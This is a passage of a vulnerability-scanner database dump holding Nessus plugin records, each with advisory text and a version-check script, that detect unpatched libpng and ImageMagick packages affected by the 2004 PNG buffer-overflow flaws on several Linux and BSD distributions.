audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng / libpng-debuginfo / libpng-devel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:15", "description": "New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix security issues. These issues could cause program\ncrashes, or possibly allow arbitrary code embedded in a malicious PNG\nimage to execute. The PNG library is widely used within the system, so\nall sites should upgrade to the new libpng package.", "edition": 23, "published": "2005-07-13T00:00:00", "title": "Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : libpng (SSA:2004-222-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2005-07-13T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:libpng", "cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2004-222-01.NASL", "href": "https://www.tenable.com/plugins/nessus/18781", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-222-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18781);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_xref(name:\"SSA\", value:\"2004-222-01\");\n\n script_name(english:\"Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : libpng (SSA:2004-222-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\nand -current to fix security issues. These issues could cause program\ncrashes, or possibly allow arbitrary code embedded in a malicious PNG\nimage to execute. The PNG library is widely used within the system, so\nall sites should upgrade to the new libpng package.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.439243\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bcef2652\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.218557\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?010ecf12\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libpng package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:libpng\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"libpng\", pkgver:\"1.2.5\", pkgarch:\"i386\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"libpng\", pkgver:\"1.2.5\", pkgarch:\"i486\", pkgnum:\"3\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"libpng\", pkgver:\"1.2.5\", pkgarch:\"i486\", pkgnum:\"3\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"libpng\", pkgver:\"1.2.5\", pkgarch:\"i486\", pkgnum:\"3\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"libpng\", pkgver:\"1.2.5\", pkgarch:\"i486\", pkgnum:\"3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:15", "description": "New imagemagick packages are available for Slackware 9.1, 10.0, and\n-current to fix security issues with PNG images.", "edition": 21, "published": "2005-07-13T00:00:00", "title": "Slackware 10.0 / 9.1 / current : imagemagick (SSA:2004-223-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2005-07-13T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.0", "p-cpe:/a:slackware:slackware_linux:imagemagick", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2004-223-02.NASL", "href": "https://www.tenable.com/plugins/nessus/18749", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2004-223-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18749);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_xref(name:\"SSA\", value:\"2004-223-02\");\n\n script_name(english:\"Slackware 10.0 / 9.1 / current : imagemagick (SSA:2004-223-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New imagemagick packages are available for Slackware 9.1, 10.0, and\n-current to fix security issues with PNG images.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.353817\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?64c7b9bf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"9.1\", pkgname:\"imagemagick\", pkgver:\"5.5.7_25\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"imagemagick\", pkgver:\"6.0.4_3\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"imagemagick\", pkgver:\"6.0.4_3\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:50", "description": "The remote host is affected by the vulnerability described in GLSA-200408-03\n(libpng: Numerous vulnerabilities)\n\n libpng contains numerous vulnerabilities including NULL pointer dereference\n errors and boundary errors in various functions.\n \nImpact :\n\n An attacker could exploit these vulnerabilities to cause programs linked\n against the library to crash or execute arbitrary code with the permissions\n of the user running the vulnerable program, which could be the root user.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version.", "edition": 24, "published": "2004-08-30T00:00:00", "title": "GLSA-200408-03 : libpng: Numerous vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-30T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:libpng"], "id": "GENTOO_GLSA-200408-03.NASL", "href": "https://www.tenable.com/plugins/nessus/14559", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200408-03.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14559);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_xref(name:\"GLSA\", value:\"200408-03\");\n\n script_name(english:\"GLSA-200408-03 : libpng: Numerous vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200408-03\n(libpng: Numerous vulnerabilities)\n\n libpng contains numerous vulnerabilities including NULL pointer dereference\n errors and boundary errors in various functions.\n \nImpact :\n\n An attacker could exploit these vulnerabilities to cause programs linked\n against the library to crash or execute arbitrary code with the permissions\n of the user running the vulnerable program, which could be the root user.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200408-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All libpng users should upgrade to the latest stable version:\n # emerge sync\n # emerge -pv '>=media-libs/libpng-1.2.5-r8'\n # emerge '>=media-libs/libpng-1.2.5-r8'\n You should also run revdep-rebuild to rebuild any packages that depend on\n older versions of libpng :\n # revdep-rebuild\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:libpng\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/libpng\", unaffected:make_list(\"ge 1.2.5-r8\"), vulnerable:make_list(\"le 1.2.5-r7\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:05:42", "description": "The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2004-08-05T00:00:00", "title": "Fedora Core 2 : libpng-1.2.5-8 (2004-239)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-05T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora_core:2", "p-cpe:/a:fedoraproject:fedora:libpng-debuginfo", "p-cpe:/a:fedoraproject:fedora:libpng-devel", "p-cpe:/a:fedoraproject:fedora:libpng"], "id": "FEDORA_2004-239.NASL", "href": "https://www.tenable.com/plugins/nessus/14210", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-239.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14210);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0597\");\n script_xref(name:\"FEDORA\", value:\"2004-239\");\n\n script_name(english:\"Fedora Core 2 : libpng-1.2.5-8 (2004-239)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000247.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?70cb77cd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libpng, libpng-debuginfo and / or libpng-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"libpng-1.2.5-8\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"libpng-debuginfo-1.2.5-8\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"libpng-devel-1.2.5-8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng / libpng-debuginfo / libpng-devel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:14:44", "description": "The remote host is missing the patch for the advisory \nSUSE-SA:2004:023 (libpng).\n\n\nSeveral different security vulnerabilities were found in the PNG\nlibrary which is used by applications to support the PNG image format.\n\nA remote attacker would be able to execute arbitrary code by triggering a\nbuffer overflow due to the incorrect handling of the length of\ntransparency chunk data and in other pathes of image processing.\n\nA special PNG image can be used to cause an application crashing due\nto NULL pointer dereference in the function png_handle_iCPP() (and\nother locations). \n\nInteger overflows were found in png_handle_sPLT(), png_read_png()\nfunctions and other locations. These bugs may at least crash an\napplication.", "edition": 22, "published": "2004-08-04T00:00:00", "title": "SUSE-SA:2004:023: libpng", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-04T00:00:00", "cpe": [], "id": "SUSE_SA_2004_023.NASL", "href": "https://www.tenable.com/plugins/nessus/14206", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2004:023\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(14206);\n script_version(\"1.12\");\n script_cve_id(\"CVE-2004-0597\",\"CVE-2004-0598\",\"CVE-2004-0599\");\n name[\"english\"] = \"SUSE-SA:2004:023: libpng\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory \nSUSE-SA:2004:023 (libpng).\n\n\nSeveral different security vulnerabilities were found in the PNG\nlibrary which is used by applications to support the PNG image format.\n\nA remote attacker would be able to execute arbitrary code by triggering a\nbuffer overflow due to the incorrect handling of the length of\ntransparency chunk data and in other pathes of image processing.\n\nA special PNG image can be used to cause an application crashing due\nto NULL pointer dereference in the function png_handle_iCPP() (and\nother locations). \n\nInteger overflows were found in png_handle_sPLT(), png_read_png()\nfunctions and other locations. These bugs may at least crash an\napplication.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2004_23_libpng.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/08/04\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the libpng package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"libpng-2.1.0.12-169\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libpng-1.2.4-115\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libpng-1.2.5-191\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libpng-1.2.5-191\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"libpng-1.2.5-182.7\", release:\"SUSE9.1\") )\n{\n security_hole(0);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:33", "description": "Chris Evans has discovered multiple vulnerabilities in libpng, which\ncan be exploited by malicious people to compromise a vulnerable system\nor cause a DoS (Denial of Service).", "edition": 26, "published": "2009-04-23T00:00:00", "title": "FreeBSD : libpng stack-based buffer overflow and other code concerns (f9e3e60b-e650-11d8-9b0a-000347a4fa7d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2009-04-23T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ko-netscape-communicator-linux", "p-cpe:/a:freebsd:freebsd:mozilla", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ja-netscape-navigator-linux", "p-cpe:/a:freebsd:freebsd:linux-netscape-navigator", "p-cpe:/a:freebsd:freebsd:firefox", "p-cpe:/a:freebsd:freebsd:png", "p-cpe:/a:freebsd:freebsd:ko-netscape-navigator-linux", "p-cpe:/a:freebsd:freebsd:netscape-communicator", "p-cpe:/a:freebsd:freebsd:pt_BR-netscape7", "p-cpe:/a:freebsd:freebsd:ja-netscape-communicator-linux", "p-cpe:/a:freebsd:freebsd:thunderbird", "p-cpe:/a:freebsd:freebsd:netscape7", "p-cpe:/a:freebsd:freebsd:de-netscape7", "p-cpe:/a:freebsd:freebsd:linux-mozilla", "p-cpe:/a:freebsd:freebsd:linux-png", "p-cpe:/a:freebsd:freebsd:linux-mozilla-devel", "p-cpe:/a:freebsd:freebsd:fr-netscape7", "p-cpe:/a:freebsd:freebsd:netscape-navigator", "p-cpe:/a:freebsd:freebsd:mozilla-gtk1", "p-cpe:/a:freebsd:freebsd:ja-netscape7", "p-cpe:/a:freebsd:freebsd:linux-netscape-communicator"], "id": "FREEBSD_PKG_F9E3E60BE65011D89B0A000347A4FA7D.NASL", "href": "https://www.tenable.com/plugins/nessus/36897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES 